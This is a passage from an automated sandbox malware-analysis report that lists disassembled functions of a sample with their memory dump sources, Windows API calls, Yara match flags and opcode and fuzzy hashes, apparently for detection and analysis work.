                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5e949badd84716eb15f9ded434582a5adab5a290ac848caa5c1ea567d17e115a
                                    • Instruction ID: cc56981afbbe35796e05a25c63102d03ea9b317b5b1e1d30e14589d9748335cf
                                    • Opcode Fuzzy Hash: 5e949badd84716eb15f9ded434582a5adab5a290ac848caa5c1ea567d17e115a
                                    • Instruction Fuzzy Hash: A552C9767447094BD308CE9ACC9159EF3E3ABC8304F498A3CE955C3346EEB8ED1A8655
                                    Function 00433D70 Relevance: .3, Instructions: 336COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7b4465b00c6dc1b81f72a93c055a9f79d6d0a72c526d12a2f377c6e95150c597
                                    • Instruction ID: 53d3127b306b8a6bc0e3889d23142d04071472a4c6ab36e2c5814b58131d9739
                                    • Opcode Fuzzy Hash: 7b4465b00c6dc1b81f72a93c055a9f79d6d0a72c526d12a2f377c6e95150c597
                                    • Instruction Fuzzy Hash: E7C1FF32A087854FD724CE09C0613ABB7E2AFC9712F98A51FE18147352D33C9E49CB5A
                                    Function 004B3786 Relevance: .3, Instructions: 259COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                    • Instruction ID: 36b0ba2eb4d864158ff65f3020a0cb7b8063780970525320d47dcf72171fc774
                                    • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                    • Instruction Fuzzy Hash: 19B18C75A0020ADFDB15CF05C5D0AE9BBA1BF48319F24C19ED85A5B382C775EE46CBA0
                                    Function 024322A0 Relevance: .2, Instructions: 186COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0377a3386d826d769c74f12b438f1f52deb1ae4eaf9644a1f8c93ba4f915ea8e
                                    • Instruction ID: 2b4ddd9a7bb9e13686c84c9944c20e956da4f234f17c3513d74d6e5086fbc979
                                    • Opcode Fuzzy Hash: 0377a3386d826d769c74f12b438f1f52deb1ae4eaf9644a1f8c93ba4f915ea8e
                                    • Instruction Fuzzy Hash: 95713B74E0414A9BDB09CFA9C4907BFBBB2FF8D304F18C46AD959AB345D6749942CB80
                                    Function 00478200 Relevance: .1, Instructions: 127COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                    • Instruction ID: ee63e5a65b8b86b81725176535607248a3982b061facca3f338870406173f4a8
                                    • Opcode Fuzzy Hash: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                    • Instruction Fuzzy Hash: 9C312D3374598203F71DCA2F9CA52FAEAD34FC522872DD87E99C98B357ECBA44168104
                                    Function 0045DE80 Relevance: .1, Instructions: 109COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: efa6c8adb8d99e167c9c970cc0212a6f9476c7cb66ca85f846bdfc1e0c1e939b
                                    • Instruction ID: 23b4e67384f28e8b30f96670869e2db9d30ba43fb0913c5e72c92879c4d65a07
                                    • Opcode Fuzzy Hash: efa6c8adb8d99e167c9c970cc0212a6f9476c7cb66ca85f846bdfc1e0c1e939b
                                    • Instruction Fuzzy Hash: D831CB227B609207D368DEBDAC80137B7939BCB346B6CC67DE545C770AC539D80B5214
                                    Function 00417F00 Relevance: 40.9, APIs: 27, Instructions: 443COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3a2c9fad27117a561ceaab87b4707d0754455d98b51ee7d1d5a925d83eec46f5
                                    • Instruction ID: f133c61ae22f8c9fda49b925379d7c90247f82b50c4ae2ca149305253c54abec
                                    • Opcode Fuzzy Hash: 3a2c9fad27117a561ceaab87b4707d0754455d98b51ee7d1d5a925d83eec46f5
                                    • Instruction Fuzzy Hash: 17D15BB2704605AFD304DFA8E8C4DABB7A9FB88365B10893AF541C7251C735EC51CBA4
                                    Function 0041A730 Relevance: 35.4, APIs: 16, Strings: 4, Instructions: 384windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 0041A775
                                    • GetCurrentObject.GDI32(?,00000002), ref: 0041A7BA
                                    • GetCurrentObject.GDI32(?,00000001), ref: 0041A7CD
                                    • GetClientRect.USER32 ref: 0041A852
                                    • CreatePen.GDI32(-00000003,00000000,?), ref: 0041A86E
                                    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041A932
                                      • Part of subcall function 004C3056: __EH_prolog.LIBCMT ref: 004C305B
                                      • Part of subcall function 004C3056: EndPaint.USER32(?,?,?,?,004175C3), ref: 004C3078
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CurrentH_prologObjectPaintRect$BeginClientClipCreateEmpty
                                    • String ID: gfff$pTL$vTL$|TL
                                    • API String ID: 3506841274-3558621277
                                    • Opcode ID: e0457c01183d502e1511cf170c366c0144e8a390d80a7a598b73ff7f0f35e907
                                    • Instruction ID: ec453efbd4b2f3ef8eb47c87bb2b7d1420d8012849b51fd9a1779ea96d3937a6
                                    • Opcode Fuzzy Hash: e0457c01183d502e1511cf170c366c0144e8a390d80a7a598b73ff7f0f35e907
                                    • Instruction Fuzzy Hash: 32E18BB55083409FC354DF59C884EAFB7E9EB88714F144A1EF59683280DB38E949CB6B
                                    Function 0042A3D0 Relevance: 33.3, APIs: 22, Instructions: 293windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFocus.USER32 ref: 0042A45F
                                    • GetWindowRect.USER32(?,?), ref: 0042A4B6
                                    • GetParent.USER32(?), ref: 0042A4C6
                                    • GetParent.USER32(?), ref: 0042A4F9
                                    • GlobalSize.KERNEL32(00000000), ref: 0042A543
                                    • GlobalFix.KERNEL32(00000000), ref: 0042A54B
                                    • IsWindow.USER32(?), ref: 0042A564
                                    • GetTopWindow.USER32(?), ref: 0042A5A1
                                    • GetWindow.USER32(00000000,00000002), ref: 0042A5BA
                                    • SetParent.USER32(?,?), ref: 0042A5E6
                                    • SendMessageA.USER32(?,0000806F,00000000,00000000), ref: 0042A631
                                    • SendMessageA.USER32(?,00008076,00000000,00000000), ref: 0042A640
                                    • GetParent.USER32(?), ref: 0042A653
                                    • SendMessageA.USER32(?,00008004,00000000,00000000), ref: 0042A66C
                                    • GetWindowLongA.USER32(?,000000F0), ref: 0042A674
                                    • SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 0042A6A4
                                    • SendMessageA.USER32(?,0000130C,00000000,00000000), ref: 0042A6B2
                                    • IsWindow.USER32(?), ref: 0042A6FE
                                    • GetFocus.USER32 ref: 0042A708
                                    • SetFocus.USER32(?,00000000), ref: 0042A720
                                    • GlobalUnWire.KERNEL32(00000000), ref: 0042A72B
                                    • GlobalFree.KERNEL32(00000000), ref: 0042A732
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$GlobalParent$Focus$FreeLongRectSizeWire
                                    • String ID:
                                    • API String ID: 3944666249-0
                                    • Opcode ID: 512df11bb18cd49c2bc0d83a3e94727cf1e86d71ce0b77e9144659acf81bc464
                                    • Instruction ID: a8e474333442983c95dbe7bd0e93462c0301ff81be8674433f3e7812319536fa
                                    • Opcode Fuzzy Hash: 512df11bb18cd49c2bc0d83a3e94727cf1e86d71ce0b77e9144659acf81bc464
                                    • Instruction Fuzzy Hash: D6A14871704300AFD764EF65DC84F2BB7E9BB88704F50892EF9418B291DB78E8058B5A
                                    Function 0042FCC0 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 245COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowRgn.USER32(?,00000000,00000001), ref: 0042FCF1
                                    • GetWindowRect.USER32(?,?), ref: 0042FD1E
                                    • BeginPath.GDI32(?), ref: 0042FDA7
                                    • MulDiv.KERNEL32(7FFF0000,?,00007FFF), ref: 0042FDC0
                                    • MulDiv.KERNEL32(00000000,?,00007FFF), ref: 0042FDCF
                                    • MulDiv.KERNEL32(3FFF0000,?,00007FFF), ref: 0042FDF7
                                    • MulDiv.KERNEL32(00000000,?,00007FFF), ref: 0042FE06
                                    • EndPath.GDI32(?), ref: 0042FE21
                                    • PathToRegion.GDI32(?), ref: 0042FE2C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Path$Window$BeginRectRegion
                                    • String ID: gfff$gfff$pTL
                                    • API String ID: 3989698161-546689930
                                    • Opcode ID: 53ff30b8afcf959ba32288bc20e96f9b3c8a69a1df0bc66d8397b847de262d70
                                    • Instruction ID: 61a35dbe99ab616be562730d7d2f4250fff31fc39792d817c3fc65f26dae67e0
                                    • Opcode Fuzzy Hash: 53ff30b8afcf959ba32288bc20e96f9b3c8a69a1df0bc66d8397b847de262d70
                                    • Instruction Fuzzy Hash: 9E81E0B16043419FC714DF25DC85E6BBBE8EBD9704F48893EF48683290DB78A909CB56
                                    Function 02424BD0 Relevance: 25.7, APIs: 17, Instructions: 245librarystringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemDirectoryA.KERNEL32(00000000,000000F8), ref: 02424C38
                                    • lstrlen.KERNEL32(00000000), ref: 02424C45
                                    • lstrcat.KERNEL32(00000000,024A55C8), ref: 02424C64
                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 02424C97
                                    • lstrcat.KERNEL32(00000000,?), ref: 02424D05
                                      • Part of subcall function 02425BE5: GetTempPathA.KERNEL32(00000080,00000000,?), ref: 02425C17
                                      • Part of subcall function 02425BE5: lstrlen.KERNEL32(00000000), ref: 02425C21
                                      • Part of subcall function 02425BE5: lstrcat.KERNEL32(00000000,024A55F4), ref: 02425C3D
                                      • Part of subcall function 02425BE5: lstrcpy.KERNEL32(00000000,00000000), ref: 02425C5A
                                      • Part of subcall function 02425BE5: lstrlen.KERNEL32(00000000,024A41D4,00000000), ref: 02425C88
                                      • Part of subcall function 02425BE5: wsprintfA.USER32 ref: 02425C94
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 02424D2A
                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000001), ref: 02424D3F
                                    • LoadLibraryExA.KERNEL32(?,00000000,00000001), ref: 02424D5F
                                    • GlobalFree.KERNEL32(?), ref: 02424D82
                                    • GetProcAddress.KERNEL32(00000000,024A3BEC), ref: 02424D95
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcatlstrlen$GlobalLibraryLoad$AddressAllocCopyDirectoryFileFreePathProcSystemTemplstrcpywsprintf
                                    • String ID:
                                    • API String ID: 1023114332-0
                                    • Opcode ID: 0e4c100697e7e7e90178251300ccf5309f8d879b79291a2d00e713789f56f091
                                    • Instruction ID: eb2e36be87dc3d877f217b81b4caaa7ab55f4f07298d2cf9b2e2978c31e5eb1f
                                    • Opcode Fuzzy Hash: 0e4c100697e7e7e90178251300ccf5309f8d879b79291a2d00e713789f56f091
                                    • Instruction Fuzzy Hash: EEB12C70900229AFDB64DFA5DC88BEEB7B5FB48304F1085D9E50AA7240D734AA85CF50
                                    Function 004A9B82 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68libraryloaderCOMMON
                                    Download Yara Rule
